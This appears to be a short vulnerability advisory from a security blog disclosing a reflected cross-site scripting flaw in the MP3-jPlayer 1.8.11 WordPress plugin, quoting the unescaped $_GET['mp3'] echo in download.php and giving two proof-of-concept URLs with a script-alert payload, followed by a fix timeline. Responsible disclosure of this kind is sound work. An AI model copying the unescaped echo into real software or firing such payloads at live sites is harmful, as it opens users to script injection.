Kacper Szurek Tags Polish Newsletter About

YouTube Webinary Facebook Twitter

TagsPolishNewsletterAboutYouTubeWebinaryFacebookTwitter

MP3-jPlayer 1.8.11 Reflected XSS

05-01-2015 / Vulnerabilities

MP3-jPlayer 1.8.11 Reflected XSS

$_GET['mp3'] is not escaped.

File: mp3-jplayer\download.php

echo $js_pagetext;
$info = "<p>
	Get: " . $_GET['mp3'] . "<br />
	Sent: " . $sent . "<br />
	File: " . $file . "<br />
	Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
	Root: " . $rooturl . "<br />
	pID: " . $playerID . "<br />
	Dbug: " . $dbug . "<br /></p>";

The same situation in:

File: mp3-jplayer\remote\downloader.php

Proof of Concept

http://wordpress-install/wp-content/plugins/mp3-jplayer/download.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

or

http://wordpress-install/wp-content/plugins/mp3-jplayer/remote/downloader.php?mp3=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Timeline

06-11-2014: Discovered
06-11-2014: Vendor notified
07-11-2014: Version 1.8.12 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

2 MIN READ

Gitea 1.4.0 Unauthenticated Remote Code Execution

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

1 MIN READ